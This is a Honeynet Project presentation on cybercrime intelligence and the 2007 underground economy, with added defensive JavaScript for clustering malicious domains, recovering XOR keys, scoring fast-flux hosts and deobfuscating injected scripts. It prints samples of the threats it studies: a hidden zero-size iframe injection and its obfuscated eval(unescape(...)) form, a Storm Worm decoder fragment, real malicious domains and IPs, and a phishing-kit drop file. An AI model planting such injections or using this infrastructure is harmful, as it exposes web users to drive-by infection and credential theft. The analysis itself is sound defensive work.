— THE HONEYNET PROJECT —


Who is Dancho Danchev?

• Independent Security Consultant - before
• Cyber Threats Analyst - nowadays
• Active blogger (ddanchev.blogspot.com)
• Diverse background equals different perspective
Presentation Outline

• Basics of OSINT and CYBERINT
• Dynamics of the Underground Economy
• Who's Who in Cybercrime for 2007?
• Conclusion and Key Summary Points
What You Will Learn After This Presentation?

• How powerful open source intelligence gathering techniques are for anticipating the emerging cyber threatscape
• An inside look at the Underground Economy with practical examples
• Who were the main cyber crime groups in 2007?
• Understand the difference between Cyber Crime 1.0 and today's Cyber Crime 2.0
The Basics of OSINT/CYBERINT

• What is OSINT and how important is it to fighting Cyber Crime?
• Competitive Intelligence and OSINT
• CYBERINT as the convergence of HUMINT, SIGINT and OSINT online
The Basics of OSINT/CYBERINT - Threat Intell Data Sources

• Publicly obtainable statistics
• Real-time incident response and preservation of actionable intelligence data
• "Informants" and cyber buddies
• Hot leads as stepping stones
• Subscriptions to Cyber Crime services newsletters
• Keep your friends close, the Cyber Criminals closer
The Basics of OSINT/CYBERINT - Threat Intell Data Sources

Table 2-1. Primary open source media

SYSTEM           | COMPONENTS                    | ELEMENTS
PUBLIC SPEAKING  | Format                        | Conference, Debate, Demonstration, Lecture, Rally
                 | Audience, Location            | Sponsor, Relationship, Message
PUBLIC DOCUMENT  | Graphic                       | Composition, Drawing, Engraving, Painting, Photograph
                 | Print                         |
                 | Compact Data Storage Device   | Digital Video Disk, Hard Disk, Tape
The Basics of OSINT/CYBERINT - Threat Intell Data Sources

Table 2-1 (continued)

SYSTEM          | COMPONENTS                    | ELEMENTS
INTERNET SITES  | Communications                | Chat, Email, News, Newsgroup, Webcam, Webcast, Weblog
                | Information (webpage content) | Commerce, Education, Government, Military, Organizations
                |                               | Dictionary, Directory, Downloads, Translation, URL Lookup
The Basics of OSINT/CYBERINT - Cyber Intelligence Practices

• Tactical Intelligence - "I want to know God's thoughts, all the rest are details"
  • consolidation of malicious parties
  • assessing their degree of collaboration
  • personalizing and profiling the groups
• Scenario Building Intelligence - Devil's Advocate
• Understanding of OPSEC
The Basics of OSINT/CYBERINT - Cyber Intelligence Practices

• Operational Intelligence
  • real-time incident response as a window of opportunity
  • Official sites, underground forums, live exploit URLs, IPs, netblocks - cross-checking for malicious activity on multiple fronts = the entire criminal ecosystem is exposed
Dynamics of the Underground Economy

• Do socioeconomic or sociocultural factors drive the Criminal Underground?
• Revenge is more powerful than Greed
• Full scale capitalism, and a microeconomic environment
Dynamics of the Underground Economy

• Common business and market practices
  • Consolidation
  • Vertical Integration
  • Benchmarking - QA
  • Standardization
• Malicious Economies of Scale
• Maturity from Products to Services
Dynamics of the Underground Economy

• Customer Service, Manuals and Video Tutorials
• Promotions and bargain deals with commodity services and products
• Exclusive, customer-tailored and proprietary tools/services
• Localization to break the entry barriers
• Risk-hedging and risk-forwarding
• Customization of products/services
• Botnets, Malware, Spamming, Phishing On Demand
Dynamics of the Underground Economy - 1000 Bots for $100
Dynamics of the Underground Economy - Malware as a Web Service

[Diagram, labels: files to download, data, file extraction, data, server execution]
Dynamics of the Underground Economy - Financial Liquidity is a Variable

Table 3. Advertised prices of items traded on underground economy servers (Source: Symantec Corporation)

Item                                                                                              | Advertised Price (in US Dollars)
United States-based credit card with card verification value                                      | $1-$6
United Kingdom-based credit card with card verification value                                     | $2-$12
An identity (including US bank account, credit card, date of birth, and government issued ID number) | $14-$18
List of 29,000 emails                                                                             | $5
Online banking account with a $9,900 balance                                                      | $300
Yahoo Mail cookie exploit - advertised to facilitate full access when successful                  | $3
Valid Yahoo and Hotmail email cookies                                                             | $3
Compromised computer                                                                              | $6-$20
Phishing Web site hosting - per site                                                              | $3-$5
Verified PayPal account with balance (balance varies)                                             | $50-$500
Unverified PayPal account with balance (balance varies)                                           | $10-$50
Skype account                                                                                     | $12
World of Warcraft account - one month duration                                                    | $10



Who's Who in Cyber Crime for 2007?

• The Russian Business Network - a Powerhouse
• Riders on the Storm Worm
• New Media Malware Gang
• Ukrtelegroup Ltd
• The Rock Phishers Crowd
Who's Who in Cyber Crime for 2007? - The Russian Business Network

• The proof that Cyber Crime cooperation has a long way to go
• 100% operational, split on different netblocks
• RBN IPs behind every high profile malware embedded attack in 2007
  • The Massive Malware Attack in Italy
  • Bank of India
  • Syrian Embassy in the U.K.
  • Possibility Media's portfolio of E-zines
Who's Who in Cyber Crime for 2007? - The Russian Business Network

• A connection between the RBN, Storm Worm and the New Media Malware Gang
• Infrastructure as a service, revenue sharing on a bargain deal, or direct involvement
• Each and every malware embedded attack assessment indicates they cooperate or have cooperated with each other
• An underground ecosystem for hosting and dissemination of malware, attack kits and exploit URLs
Who's Who in Cyber Crime for 2007? - The Russian Business Network

• Started issuing fake "account suspended notices" upon getting "blogosphered"
• The enemy you know is better than the enemy you don't know - no OPSEC policy
• Centralization => efficiency and ease of management => easy to block/traceback
• Chasing down the RBN - how to breathe down the RBN's neck?
Who's Who in Cyber Crime for 2007? - The RBN

Table 1. RBN-hosted rogue anti-spyware domains (2007, rbnexploit.blogspot.com)

 #  | Domain                 | Blacklisted (1) | Hosting IPs
 1  | adwareremover2007.com  | yes             | 203.121.79.55, 203.117.175.116, 69.50.167.172
 2  | antispyzone.com        | yes             | 85.255.118.162, 195.3.100.7
 4  | antiverminser.net      | yes             | 85.255.119.66, 85.255.119.67
 5  | antiverminspro.net     | yes             | 85.255.119.66, 85.255.119.67
 6  | malwarealarm.com       | yes             | 203.121.79.55, 69.50.167.172
 8  | sigmacode.biz          | no              | 85.255.117.205
 9  | spyexe.biz             | yes             | 195.225.176.68, 195.225.176.76
 14 | thecleanersystem.com   |                 |
    | virusburst.com         |                 |
 20 | windowsafesurf.com     |                 |
    | virusprotectpro.biz    | no              | 203.117.175.116, 203.121.79.55

Notes:
1. Blacklisting for core IP address - ref: Spamhaus SBL, XBL
(all within McAfee's SiteAdvisor as "Red X")
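The cross-checking described under Operational Intelligence (live exploit URLs, IPs and netblocks checked against each other) and the domain/IP tables on this and the next slide are the same pivot: domains that share a hosting address, or sit in the same netblock, belong to one operation, and the addresses that carry the most domains are the "core IPs" worth blacklisting first. The block below is an added example, not the presentation's or the rbnexploit report's code. SAMPLE_RESOLUTIONS is a constructed sample built from a few rows of the deck's Table 1 and Table 4 rather than a live lookup, and the function names are assumptions of this example.

```javascript
'use strict';
// Added example, not from the presentation: pivoting across rogue anti-spyware
// domains by shared hosting IPs and shared netblocks. SAMPLE_RESOLUTIONS is a
// constructed sample built from a few rows of the deck's RBN tables; it is not
// the output of a live lookup.

const SAMPLE_RESOLUTIONS = {
  'adwareremover2007.com': ['203.121.79.55', '203.117.175.116', '69.50.167.172'],
  'malwarealarm.com':      ['203.121.79.55', '69.50.167.172'],
  'xspy-shredder.com':     ['203.121.79.55', '203.117.175.116', '69.50.167.172'],
  'xmalwarestorm.com':     ['203.117.175.116', '69.50.167.172'],
  'antiverminser.net':     ['85.255.119.66', '85.255.119.67'],
  'antiverminspro.net':    ['85.255.119.66', '85.255.119.67'],
  'sigmacode.biz':         ['85.255.117.205'],
  'spyheal.com':           ['69.50.160.60', '69.50.160.61', '69.50.160.62'],
};

// Octet-aligned netblock of an IPv4 address: netblock('69.50.167.172', 24) -> '69.50.167.0/24'.
function netblock(ip, prefix) {
  const octets = ip.split('.');
  if (octets.length !== 4 || ![8, 16, 24].includes(prefix)) {
    throw new Error(`unsupported address or prefix: ${ip}/${prefix}`);
  }
  const keep = prefix / 8;
  return octets.slice(0, keep).concat(Array(4 - keep).fill('0')).join('.') + `/${prefix}`;
}

// Map each pivot key (an IP, or its /prefix netblock) to the domains seen on it.
function keyToDomains(resolutions, prefix) {
  const index = new Map();
  for (const [domain, ips] of Object.entries(resolutions)) {
    for (const ip of ips) {
      const key = prefix ? netblock(ip, prefix) : ip;
      if (!index.has(key)) index.set(key, new Set());
      index.get(key).add(domain);
    }
  }
  return index;
}

// Connected components over "shares a key" (union-find). Without a prefix,
// domains link on the exact IP; with 24 or 16 they link on the netblock, which
// is what exposes a hoster's range rather than a single box.
function clusterDomains(resolutions, prefix) {
  const parent = new Map(Object.keys(resolutions).map((d) => [d, d]));
  const find = (x) => {
    while (parent.get(x) !== x) {
      parent.set(x, parent.get(parent.get(x)));
      x = parent.get(x);
    }
    return x;
  };
  for (const domains of keyToDomains(resolutions, prefix).values()) {
    const [first, ...rest] = domains;
    for (const d of rest) parent.set(find(first), find(d));
  }
  const clusters = new Map();
  for (const domain of Object.keys(resolutions)) {
    const root = find(domain);
    if (!clusters.has(root)) clusters.set(root, []);
    clusters.get(root).push(domain);
  }
  return [...clusters.values()].map((c) => c.sort()).sort((a, b) => b.length - a.length);
}

// Addresses hosting at least minDomains of the set, ranked by how many they
// carry: the "core IP addresses" the deck's tables blacklist.
function hubIps(resolutions, minDomains = 2) {
  return [...keyToDomains(resolutions).entries()]
    .filter(([, domains]) => domains.size >= minDomains)
    .sort((a, b) => b[1].size - a[1].size)
    .map(([ip, domains]) => ({ ip, domains: [...domains].sort() }));
}

console.log('by IP:', clusterDomains(SAMPLE_RESOLUTIONS));
console.log('by /16:', clusterDomains(SAMPLE_RESOLUTIONS, 16));
console.log('hub IPs:', hubIps(SAMPLE_RESOLUTIONS));
```

On the sample, exact-IP clustering separates the 203.x/69.50.167.x group from the 85.255.119.x pair, sigmacode.biz and spyheal.com; widening to /16 merges spyheal.com into the first group and sigmacode.biz into the second, which is the netblock view the deck's "split on different netblocks" remark refers to. The widening is a hypothesis generator, not proof: a shared /16 at a large hoster also links unrelated customers, so the exact-IP and /24 links are the ones to act on.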
Who's Who in Cyber Crime for 2007? - The RBN

Table 4. RBN-hosted rogue anti-spyware domains, continued (2007, rbnexploit.blogspot.com)

 #  | Domain             | Blacklisted (1) | Hosting IPs
 21 | adprotect.com      | yes             | 216.255.190.74, 207.226.173.114
 23 | antivirusgold.com  | no              | 207.226.173.67
 30 | spyheal.com        |                 | 69.50.160.60, 69.50.160.61, 69.50.160.62
    | spywall.net        |                 | 69.50.160.61
 36 | thespyguard.com    | no              |
    | spywarequake.com   |                 |
 38 | virusrescue.com    |                 |
 39 | xmalwarestorm.com  | no              | 203.117.175.116, 203.121.79.55, 69.50.167.172
 40 | xspy-shredder.com  | yes             | 203.121.79.55, 203.117.175.116, 69.50.167.172

Further addresses appearing in the table: 69.50.183.30, 85.255.117.62, 64.28.183.99, 69.50.168.98, 69.50.182.20, 69.50.183.26, 69.50.182.92, 66.29.15.144, 69.50.182.22, 66.29.15.141, 69.50.170.82, 69.50.168.99, 85.255.117.60

Notes:
1. Blacklisting for core IP address - ref: Spamhaus SBL, XBL
(all within McAfee's SiteAdvisor as "Red X")
Who's Who in Cyber Crime for 2007? - The RBN

Open directory listing on an RBN-hosted malware server:

Index of /ms

Name                        Last modified       Size
Parent Directory
001.exe                     26-Feb-2007 20:10   45K
006.exe                     28-Feb-2007 04:09   38K
01010101.exe                05-Mar-2007 11:47   28K
011.exe                     28-Feb-2007 11:33   43K
1.exe                       04-Jan-2007 18:59   8.1K
1.php                       04-Dec-2006 00:36   23
1.rar                       16-Jan-2007 16:59   37K
33.exe                      29-Mar-2007 14:47   33K
101.exe                     02-Jan-2007 17:32   42K
1303.exe                    13-Mar-2007 05:49   17K
1304.exe                    16-Apr-2007 09:57   19K
171717-inst.exe             05-Mar-2007 11:48   105K
452225.exe                  17-Feb-2007 08:36   9.4K
1663800.exe                 16-Jan-2007 17:12   39K
21212121-inst.exe           06-Mar-2007 11:53   105K
27777777777777777-inst.exe  13-Mar-2007 14:27   105K
installer.exe               12-Feb-2007 19:38   9.4K
bho.exe                     17-Apr-2007 10:02   230K
bhob.exe                    21-Nov-2006 22:41   51K
blagodat?-inst.exe          29-Mar-2007 07:06   106K
bot.exe                     19-Sep-2006 18:32   69K
...
Who's Who in Cyber Crime for 2007? - Stormy Wormy

• Persistence, simplicity, and outdated vulnerabilities lead to the world's largest botnet
• Storm Worm is not an Attack, it's a Campaign
• Storm Worm is a Russian malware operation
Who's Who in Cyber Crime for 2007? - Stormy Wormy

The string decoder from a Storm Worm landing page: the page body is XOR'd with a one-byte key and decoded in the browser at load time, so the exploit markup never appears in the clear on disk.

<script language="JavaScript">
function xor_str(plain_str, xor_key) {
  var xored_str = "";
  for (var i = 0; i < plain_str.length; ++i)
    xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i));
  return xored_str;
}
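A one-byte XOR like the xor_str() above has a 256-key search space, so an analyst never needs to run the page to read it. The block below is an added example, not the Storm Worm page's own code: it re-implements the decoder and then recovers the key from an obfuscated body by trying every key and scoring each candidate for the markers an exploit page contains once decoded. The obfuscated input is constructed here from a hypothetical hidden iframe pointing at a reserved example host, not a payload from the deck; the scoring markers and function names are assumptions of this example.

```javascript
'use strict';
// Added example, not the Storm Worm page's own code: the one-byte XOR string
// decoder shown above, plus the analyst's reverse of it, which recovers the key
// from an obfuscated script body without executing anything. The obfuscated
// input is constructed below from a hypothetical payload.

// Same logic as the page's xor_str(): XOR every character with one key byte.
function xorStr(plainStr, xorKey) {
  let out = '';
  for (let i = 0; i < plainStr.length; ++i) {
    out += String.fromCharCode(xorKey ^ plainStr.charCodeAt(i));
  }
  return out;
}

// Substrings an exploit page contains in the clear once decoded (assumed set).
const MARKERS = ['<iframe', '<script', 'http://', '.exe', 'document.write', 'src='];

// Score a candidate decoding: reward markers, penalise non-printable bytes.
function scoreCandidate(text) {
  let score = 0;
  const lower = text.toLowerCase();
  for (const marker of MARKERS) if (lower.includes(marker)) score += 10;
  for (let i = 0; i < text.length; ++i) {
    const c = text.charCodeAt(i);
    const printable = (c >= 0x20 && c <= 0x7e) || c === 0x09 || c === 0x0a || c === 0x0d;
    if (!printable) score -= 1;
  }
  return score;
}

// Try all 256 keys; a one-byte XOR has no other search space.
function bruteForceXor(obfuscated) {
  let best = { key: null, text: '', score: -Infinity };
  for (let key = 0; key < 256; ++key) {
    const text = xorStr(obfuscated, key);
    const score = scoreCandidate(text);
    if (score > best.score) best = { key, text, score };
  }
  return best;
}

// Constructed sample: a hidden iframe of the kind the decoded page would
// document.write(); the host is a reserved example name, not one from the deck.
const SAMPLE_PLAINTEXT =
  '<iframe src="http://exploit.example.invalid/ind.php" width="0" height="0"></iframe>';
const SAMPLE_KEY = 0x4b;
const SAMPLE_OBFUSCATED = xorStr(SAMPLE_PLAINTEXT, SAMPLE_KEY);

console.log(bruteForceXor(SAMPLE_OBFUSCATED));
```

The key is normally sitting in the page as the second argument to xor_str(), so brute force is only needed when the call site is itself obfuscated or the body was captured without it; the marker scoring is what makes the right key stand out, since a wrong key turns most of the text into control characters.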
Who's Who in Cyber Crime for 2007? - Stormy Wormy

• Storm Worm's Fast-Flux Networks
  • bnably.com
  • wxtaste.com
  • snbane.com
  • tibeam.com
  • eqcorn.com
• dropped domains as key fast-flux nodes before the "infrastructure" scaled enough
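What made the Storm Worm names above fast-flux is that each resolved to a rotating set of infected home machines with near-zero TTLs, so a single lookup says nothing and a series of lookups says everything. The block below is an added example, not the presentation's code, that scores a name from repeated resolutions using the usual signals (distinct addresses, distinct /16 blocks, minimum TTL, churn between answers). The lookup snapshots are a constructed sample with hypothetical names and addresses, and the thresholds are chosen to separate that sample, not calibrated against real traffic.

```javascript
'use strict';
// Added example, not from the presentation: fast-flux scoring from repeated
// DNS lookups. SAMPLE_LOOKUPS is constructed data imitating what an analyst
// sees resolving a domain every few minutes; names and addresses are made up.

const SAMPLE_LOOKUPS = {
  'flux.example.invalid': [
    { ttl: 0, answers: ['24.15.8.3', '71.62.9.14', '98.203.1.77', '68.44.5.9', '76.112.33.2'] },
    { ttl: 0, answers: ['71.62.9.14', '174.90.4.1', '24.15.8.3', '66.31.7.8', '99.240.1.6'] },
    { ttl: 0, answers: ['174.90.4.1', '12.210.9.9', '99.240.1.6', '98.203.1.77', '81.102.4.4'] },
    { ttl: 0, answers: ['81.102.4.4', '66.31.7.8', '12.210.9.9', '65.92.5.3', '189.20.1.1'] },
  ],
  'static.example.invalid': [
    { ttl: 86400, answers: ['203.0.113.10'] },
    { ttl: 86400, answers: ['203.0.113.10'] },
    { ttl: 86400, answers: ['203.0.113.10'] },
    { ttl: 86400, answers: ['203.0.113.10'] },
  ],
  // Round-robin inside one provider's block: low TTL but not flux.
  'cdn.example.invalid': [
    { ttl: 60, answers: ['198.51.100.1', '198.51.100.2', '198.51.100.3'] },
    { ttl: 60, answers: ['198.51.100.2', '198.51.100.3', '198.51.100.4'] },
    { ttl: 60, answers: ['198.51.100.3', '198.51.100.4', '198.51.100.1'] },
    { ttl: 60, answers: ['198.51.100.4', '198.51.100.1', '198.51.100.2'] },
  ],
};

function slash16(ip) { return ip.split('.').slice(0, 2).join('.') + '.0.0/16'; }

// Signals: distinct addresses, distinct /16 blocks, lowest TTL, and the share
// of each answer set that was not in the previous one (churn).
function fluxFeatures(lookups) {
  const ips = new Set();
  const blocks = new Set();
  let churn = 0;
  for (let i = 0; i < lookups.length; ++i) {
    for (const ip of lookups[i].answers) { ips.add(ip); blocks.add(slash16(ip)); }
    if (i > 0) {
      const prev = new Set(lookups[i - 1].answers);
      const fresh = lookups[i].answers.filter((ip) => !prev.has(ip)).length;
      churn += fresh / lookups[i].answers.length;
    }
  }
  const minTtl = Math.min(...lookups.map((l) => l.ttl));
  return {
    uniqueIps: ips.size,
    uniqueBlocks: blocks.size,
    minTtl,
    churn: lookups.length > 1 ? churn / (lookups.length - 1) : 0,
  };
}

// Thresholds are assumptions chosen for the sample above. Dispersion across
// many networks is weighted highest: a CDN rotates addresses too, but inside
// its own blocks, while bot hosts sit in consumer ranges all over the world.
function fluxScore(lookups) {
  const f = fluxFeatures(lookups);
  let score = 0;
  if (f.minTtl <= 300) score += 1;
  if (f.uniqueIps >= 10) score += 1;
  if (f.uniqueBlocks >= 5) score += 2;
  if (f.churn >= 0.5) score += 1;
  return { ...f, score, fastFlux: score >= 4 };
}

for (const [domain, lookups] of Object.entries(SAMPLE_LOOKUPS)) {
  console.log(domain, fluxScore(lookups));
}
```

The distinction the cdn.example.invalid entry makes matters in practice: low TTL and rotating answers alone also describe legitimate load balancing, so a flux verdict should rest on address dispersion across unrelated networks, ideally confirmed with ASN lookups rather than the /16 approximation used here.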
Who's Who in Cyber Crime for 2007? - New Media Malware Gang


• Domain farms of live exploit URLs, malware C&C
• Has used and is still using RBN infrastructure
• Connection with Storm Worm and several high profile malware embedded attacks
• Same infrastructure is used by the RBN, Storm Worm and the New Media Malware Gang
• A Russian malware group
Who's Who in Cyber Crime for 2007? - New Media Malware Gang

• The Gang speaks out - "get lost" and die()
• Dots dots dots
• musicbox1.cn/iframe.php refreshes textdesk.com - refreshing Storm Worm domains - eliteproject.cn; takenames.cn; blOcker.info; soace-sms.info
• French government's Libya site hack assessment ends up at 208.72.168.176 - the gang's main IP

Who's Who in Cyber Crime for 2007? - New Media Malware Gang
Reverse DNS / co-hosted domain listing for the gang's infrastructure:

IP               | Reverse DNS                           | Domain
64.111.107.39    | basic-vat.go.dreamhost.com            | apnea.health-hack.com
194.95.203.118   |                                       | e-learningcenter.ru
69.50.164.13     | 69.50.164.13-custblock.intercage.com  |
66.246.239.97    | st-97-239-246-66.2dayhost.com         |
203.117.111.102  |                                       | orentraff.cn
209.160.28.70    | rs2.juhost.ru                         |
203.117.111.106  |                                       | traffurl.ru
81.177.16.30     | grosha.majordomo.ru                   | jkh-novgorod.ru
61.9.5.95        | meta.tomstudio.ru                     | takbormi.ru
116.0.105.11     |                                       | flashupdate.net
124.217.241.200  | ns11.ipnames.net                      |

Further names in the same listing: spl.vip-ddos.org, trffc.org, s051.net, natural-amber.com
Who's Who in Cyber Crime for 2007? - Ukrtelegroup Ltd

• Dispersed over several different netblocks - 88.255.114.*; 88.255.113.*; 88.255.94.*; 88.255.120.*
• Huge farm for hosting malware, downloaders' update locations, live exploit URLs, malware C&C
• Cooperation with the RBN, Storm Worm campaigners and the New Media Malware Gang
• Known RBN customers using their services

Who's Who in Cyber Crime for 2007? - Ukrtelegroup Ltd


[Screenshot: anti-virus scan log, columns Date, Risk, Origin, Findings]

Date               | Findings
29.1.2008 18:23:03 | Trojan-Downloader.FlG, Trojan-Downloader.Win32.Small.cxx, Generic Downloader...
29.1.2008 10:09:11 | Trojan-Spy.Bankject, Trojan-Spy.Banker.EG
25.1.2008 16:52:26 | Trojan-Downloader.FlG, Trojan-Downloader.Win32.Small.cxx, Generic Downloader...
25.1.2008 13:25:31 | Possible Mucrp-6, Trojan-Downloader.Fld, Trojan-Downloader.Win32.Small.cxx
25.1.2008 13:24:35 | Possible Mucrp-6
24.1.2008 22:17:39 | Possible Mucrp-6
23.1.2008 02:03:55 | Possible Mucrp-6, Trojan-Downloader.FlG, Generic Downloader...
22.1.2008 07:42:36 | Trojan-Downloader.Win32.Small.bbw
20.1.2008 12:28:32 | Possible Mucrp-6
18.1.2008 01:53:40 | Trojan-Downloader.Win32.Agent.hge, Trojan.Win32.Ghost.aeq...
Who's Who in Cyber Crime for 2007? - Rock Phishers Crowd

• Standardizing Phishing and Social Engineering
• Malicious Economies of Scale
• Several different gangs
• Rock Phishing's a trend not a fad
• Static and descriptive structure
• 209 Host Locked
• 209.1 Host Locked
• 66.1 Host Locked


Directory listing of a rock phish kit, one folder per targeted bank (Name / Last modified):

Barclays/, CaixaPenedes/, cpnl/, alliance-leicester/, bankofcyprus/, bankofscotland/, banorte/, bybank/, cahoot/, cc-bank/, commbank/, postbank/, rasbank/, rbsdigital/, santander/, scotiabank/, unicredit/, woolwich/

(last-modified dates between 12-Jan-2005 and 09-Mar-2006)


http://login.internetbankingzone.biz/
http://login.internetbankingzone.biz/CaixaPenedes/data.txt

Contents of the kit's drop file (Catalan form labels: "Codi de client i nom d'usuari" = client code and user name, "Clau d'entrada" = access key):

Codi de client i nom d'usuari: 4132
Clau d'entrada:
Security: 1432

Codi de client i nom d'usuari: test
Clau d'entrada:
Security: test

Codi de client i nom d'usuari: pepito
Clau d'entrada:
Security: pepito

Codi de client i nom d'usuari:
Clau d'entrada: 122455
Security: 13345

Codi de client i nom d'usuari: pepita
Clau d'entrada: 502345

Codi de client i nom d'usuari: jejeje...
Clau d'entrada: dddddddddddd
Security: dddddddddddd

... nadie pica! ("nobody bites!")
Cyber Crime 1.0 and Cyber Crime 2.0 - DIY tools matured into Malware Kits

[Screenshot: "IE Exploiter" by irk (@linuxmail.org), distributed via http://areyoufearless.com. Visible text and controls: "EXE File:", "Before we start please note that not all versions of Internet Explorer are vulnerable to this...", "Server" / "Browse", "Finished Encoding", "Loaded 31700 of 31744 bytes... Hit ESC to cancel", "Encode Server", "Create Document", "Sabotage", "Help", and a URL field with the example "http://server.com/server.exe".]
Cyber Crime 1.0 and Cyber Crime 2.0 - DIY tools matured into Malware Kits

[Screenshot: "ZIEPHORUS" downloader builder. Visible controls: "Load here the application to execute" / "Load Server", "Use Default Page", "Make an HEX copy", URL field "http://www.myserver.here/test.mp3", "Output Folder", "Server ICQ notify", "Startup Method", "smart path checking", "additional custom path", "Exec Delay (ms) 5000", "Denial of Service", "Fake window :-]", "Generate".]
Cyber Crime 1.0 and Cyber Crime 2.0 - DIY tools matured into Malware Kits

• Rootlauncher Kit, WebAttacker, MPack, IcePack, Zunker, Pinch, Apophis, FirePack, Advanced Pack, Nuclear Malware Kit, Metaphisher Banker Kit, Nuclear Grabber - the list is endless
• Modularity, Open Source, Localization, "Add an exploit" DIY customization
Cyber Crime 1.0 and Cyber Crime 2.0 - DIY tools matured into Malware Kits

Level 0 - what the kit injects into a compromised page. The plain form is a zero-size iframe; the obfuscated form hides the same iframe behind eval(unescape(...)) and String.fromCharCode(...), where the first twelve codes (60,105,102,114,97,109,101,32,115,114,99,61) spell "<iframe src=":

<iframe src="index.php" width="0" height="0"></iframe>

<script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C ... 
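The eval(unescape("document.write(String.fromCharCode(...))")) layer above is reversible by hand, and doing it by hand is the point: the analyst gets the iframe destination without ever evaluating kit-supplied code. The block below is an added example, not MPack's or any kit's code. It peels the percent-encoding and the char-code layer statically and pulls the iframe src out of the result; the encoded input is constructed inside the block from a hypothetical iframe pointing at a reserved example host, not from the deck's own (truncated) payload, and the function names are assumptions of this example.

```javascript
'use strict';
// Added example, not any kit's code: statically unwrapping the
// eval(unescape("document.write(String.fromCharCode(...))")) layer shown
// above. SAMPLE_SCRIPT is constructed below from a hypothetical iframe.

// Undo the %XX / %uXXXX escaping that unescape() would undo, by hand, so
// nothing from the page is evaluated.
function percentDecode(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u4, x2) => String.fromCharCode(parseInt(u4 || x2, 16)));
}

// Pull the quoted argument out of eval(unescape("...")); null if absent.
function extractUnescapeArg(script) {
  const m = /eval\s*\(\s*unescape\s*\(\s*(["'])([\s\S]*?)\1\s*\)\s*\)/.exec(script);
  return m ? m[2] : null;
}

// Replace each String.fromCharCode(60,105,...) with the literal it builds and
// return both the rewritten JS and the recovered literals.
function foldFromCharCode(js) {
  const literals = [];
  const folded = js.replace(/String\.fromCharCode\s*\(([\d\s,]*)\)/g, (_, list) => {
    const text = list.split(',').filter((n) => n.trim() !== '')
      .map((n) => String.fromCharCode(Number(n.trim()))).join('');
    literals.push(text);
    return JSON.stringify(text);
  });
  return { js: folded, literals };
}

// One pass: peel the eval(unescape(...)) layer, then fold the char-code layer.
function decodeLayer(script) {
  const arg = extractUnescapeArg(script);
  return arg === null ? null : foldFromCharCode(percentDecode(arg));
}

// The indicator an analyst wants out of the page: where the hidden iframe points.
function iframeSources(text) {
  const out = [];
  const re = /<iframe\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  let m;
  while ((m = re.exec(text)) !== null) out.push(m[1]);
  return out;
}

// Constructed sample, encoded the way the kit output above is (every
// non-alphanumeric byte percent-escaped); the host is a reserved example name.
function encodeLikeKit(html) {
  const codes = [...html].map((c) => c.charCodeAt(0)).join(',');
  const inner = `document.write(String.fromCharCode(${codes}))`;
  const escaped = inner.replace(/[^A-Za-z0-9]/g,
    (c) => '%' + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0'));
  return `<script language="JavaScript">eval(unescape("${escaped}"))</script>`;
}

const SAMPLE_HTML =
  '<iframe src="http://kit.example.invalid/ice/index.php" width="0" height="0"></iframe>';
const SAMPLE_SCRIPT = encodeLikeKit(SAMPLE_HTML);

const decoded = decodeLayer(SAMPLE_SCRIPT);
console.log(decoded.js);
console.log(iframeSources(decoded.literals.join('\n')));
```

Real kit pages stack several such layers, so decodeLayer() is run again on each recovered literal until no eval(unescape(...)) remains; the iframe src is then fed into the same domain/IP cross-checking the deck describes for the RBN.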
Cyber Crime 1.0 and Cyber Crime 2.0 - DIY tools matured into Malware Kits

[Screenshot: MPack statistics panel (Chinese-language build), snapshot dated 8-Aug-2007 18:04:10, with a per-country row for China and browser/OS breakdown rows "IE XP ALL", "Win2000", "Firefox"; footer "(c) 2007 ... MPack".]
Cyber Crime 1.0 and Cyber Crime 2.0 - DIY tools matured into Malware Kits

[Screenshot: Web-Attacker (IE0604) config editor: "Enter here an URL path for CGI-script on your server" (http://www.yourhost.com/cgi-bin/...), "Enter here the folder name for placing an output exploit components" (c:\e0604\Output), "(c) by Inet-Lux Team, 2006". Beside it, the kit's web panel: "Please enter the password to access the administration panel", "Web-Panel password: admin", "Total number of installed unique launchers is: 1013", "Registered bot ID ...", and the "Authorization Required" Username/Password prompt.]
[Screenshot: Russian-language traffic and loader statistics panel. Title: "Скрипт для учёта трафика" (Traffic accounting script); subtitle: "Администрирование статистики по загрузкам с трафика" (Administration of download statistics from traffic). Visible labels, translated:
- Login, Password, Add user, Help, Exit
- Traffic statistics: browser versions (Firefox, MSIE, Opera, other), total traffic, unique visitors, repeat-view attempts [banned]
- Statistics on downloads of your program: infected machines [total], infected machines [per day], infected IPs
- Calculation of exploit penetration rate: total exploit penetration across all Windows systems; infections by operating system (Windows 2000, Windows 98, other); "Exploit triggered: [ ] times"]


[Screenshot: banker kit control panel ("Welcome, root") listing captured credential files (form.txt) per targeted bank, e.g. unicaja, with "Test" and "Save to" actions.]


[Screenshot: MPack "СТАТИСТИКА" (STATISTICS) panel; tabs [STATISTICS] [BROWSERS] [IP'S] [CONFIG] [CLEANUP]; views: Итого (Total), Браузеры (Browsers), ОС (OS), Страны (Countries)]

Country (Страна)    | Requests (Запросов) | Exploited (Пробивов)
GERMANY             | 39                  | 4 (10.26%)
UNITED STATES       | 130                 | 8 (6.15%)
POLAND              | 138                 | 16 (11.59%)
LITHUANIA           | 1                   | 0 (0.00%)
...nia              | 117                 | 11 (9.40%)
SPAIN               | 26                  | 5 (19.23%)
AUSTRIA             | 3                   | 0 (0.00%)
CANADA              | 12                  | 3 (25.00%)
NORWAY              | 20                  | 1 (5.00%)
AUSTRALIA           | 14                  | 0 (0.00%)
RUSSIAN FEDERATION  | 13                  | 7 (53.85%)
JAPAN               | 4                   | 0
UNITED KINGDOM      | 27                  | 1 (3.70%)
SWEDEN              | 5                   | 0
TURKEY              |                     | 3

Further countries listed: FRANCE, EL SALVADOR, LATVIA, COLOMBIA, ROMANIA, DENMARK, NEW ZEALAND, AZERBAIJAN, LUXEMBOURG, CYPRUS, MEXICO, FINLAND, JORDAN, ITALY, NETHERLANDS, CHILE
Conclusion and Key Summary Points

• It's all a matter of perspective
• How deep do you really want to go?
• Personal efforts expand the entire ecosystem
• Cyber Criminals are lazy
• Keep it Simple Stupid (KISS) - pragmatic Cyber Crime
• Assess the final product or infiltrate the assembly line?


Conclusion and Key Summary Points

• OSINT through Botnets
• Corporate Espionage through Botnets
